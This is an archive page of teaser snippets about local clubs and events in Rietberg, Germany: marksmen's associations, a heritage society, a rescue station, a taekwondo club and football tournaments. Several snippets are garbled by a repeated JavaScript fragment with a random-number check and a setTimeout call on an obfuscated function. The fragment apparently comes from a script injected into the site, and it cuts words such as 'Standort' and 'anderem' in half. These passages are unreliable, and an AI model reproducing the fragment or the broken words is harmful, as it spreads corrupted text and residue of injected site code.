Category Archives: Vereine in Rietberg

Mark Brockschnieder übernimmt Blomberg-Betrieb

Eine bessere Zwischenlösung hätte sich die Stadt Rietberg nicht wünschen können: Mit Gastwirt Mark Brockschnieder hat sie vorübergehend einen Pächter für die Gaststätte Blomberg an der Rathausstraße gefunden. Die Stadt hatte die Immobilie erworben, um mittelfristig unter andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderem die Stadtbibliothek dort unterzubringen. Doch ab dem 4. Februar

Verjüngungskur in Mastholte

Nach langer Vorbereitungszeit konnten wir nun an unserem Standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andort Mastholte einen neuen Rettungswagen (RTW) in Anwesenheit einiger Unterstützter in Dienst stellen. Nachdem unser bisher am Standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andort Mastholte stationierter RTW in die Jahre gekommen war, starten wir vor ca. 1

„Gemütlicher Abend“ reißt die Gäste von den Stühlen

Beim traditionellen „Gemütlichen Abend“ der St. Johannes Schützenbruderschaft Druffel gab es am vergangenen Samstag im Landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andhaus Wimmelbücker wieder ein erstklassiges Unterhaltungsprogramm mit Tanzgruppen und Künstlern die die rund 150 Gäste von den Stühlen rissen. Herausragender Akteur des Abends war NDR Comedypreisträger Herr Nils. Der Körperillusionist begeisterte die

Generalversammlung in Druffel – Neue Aufgaben für bewährte Kräfte

Die St. Johannes Schützenbruderschaft Druffel hat auf ihrer Generalversammlung ihren Schützenkönig Dirk Meier zum neuen Schriftführer, Ralf Otterpohl zum neuen Adjutanten des Oberst und Stephan Schulze zum neuen Thronoffizier gewählt. Das Personalkarussell musste gedreht werden, nach dem Schriftführer Mario Kohl und Adjutant Meinolf Buschsieweke sich aus beruflichen und familiären Gründen nicht zur Wiederwahl stellten. In

Versammlung Heimatverein mit Vorstandswahlen und Vorschau auf 2019

Die Mitgliederversammlung des Heimatverein Mastholte war geprägt von Dankesworten und Lob für die Aktiven Mitglieder und Vorstände. Nach dem gemeinsamen Essen starteten ca. 140 Gäste in die Regularien. Grußworte der Stadt überbrachte redegewandt Detlev Hanemann als stellvertretender Bürgermeister. Er bekannte sich dazu, dass in Mastholte Sachen funktionieren, die in anderen Ortsteilen noch nicht soweit sind.

Andreas Sunder lernt Vereinsalltag kennen

Die Resonanz ist durchweg positiv auf Andreas Sunders Interesse an den Rietberger Vereinen. Fast 40 Termine hat der Bürgermeister in den vergangenen sechs Monaten vereinbart und wahrgenommen, um die Vereine vor Ort zu besuchen. An Versammlungen und Veranstaltungen der hiesigen Vereine hat Rietbergs erster Bürger in der Vergangenheit schon immer gern teilgenommen, wenn er eingeladen

Taekwondo-Verein zieht in die Hauptschule

Die Feuerwehr kommt, ein Bestandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andsgebäude muss weichen: Für die Mastholter Blauröcke ist der Bau eines neuen Feuerwehrgerätehauses an der Lippstädter Straße geplant. Dafür muss das Haus mit der Nummer 45 abgerissen werden. Dem Taekwondo-Verein Mastholte, der dort in Räumen im Obergeschoss trainiert, stellt die Stadt Rietberg jetzt

Nachbericht zum Obi-Cup und Alt-Herren Turnier von Germania Westerwiehe

Der neue Jugendleiter von Germania Westerwiehe Philipp Isenborth hat uns folgenden Bericht zukommen lassen, den wir an dieser Stelle gerne veröffentlichen: Am Freitag starteten die „Alten Herren“ in das Jubiläumsturnier. Bei bestem Wetter konnten spannende Spiele beobachtet werden. Germanias Alte Herren kamen auf einen sehr guten 3 Platz. Verdienter Turniersieger wurde die Mannschaft aus Verl.

Vogelzuchtverein rüstet sich für die Ausstellung

Die Vorbereitungen zu einer der artenreichsten Vogelausstellungen in Ostwestfalen laufen beim Vogelzucht- und Schutzverein Rietberg auf Hochtouren. Durch die Aufnahme von neuen Mitgliedern können vom 13.-15. November im Autohaus Pepping weitere Vogelarten gezeigt werden. Insbesondere für die in diesem Jahr erstmalig ausgestellten Aras sind neue Volieren zu bauen. Die Volieren werden seit Gründung des Vereins immer in Eigenarbeit selbst erstellt. Am letzten

Sportwerbewoche / U12 Cup Schwarz-Gelb Bokel

Dieses Jahr dreht sich in Bokel vom 04.08.-09.08.2015 wieder alles Rund um den Fußball, denn in diesem Jahr findet bereits zum 36. Mal die traditionale Sportwerbewoche statt. Wie jedes Jahr ist es eine Veranstaltung für Groß und Klein. Angefangen von den Mini-Kickern bis hin zu den Senioren darf auch in diesem Jahr jede Mannschaft Ihr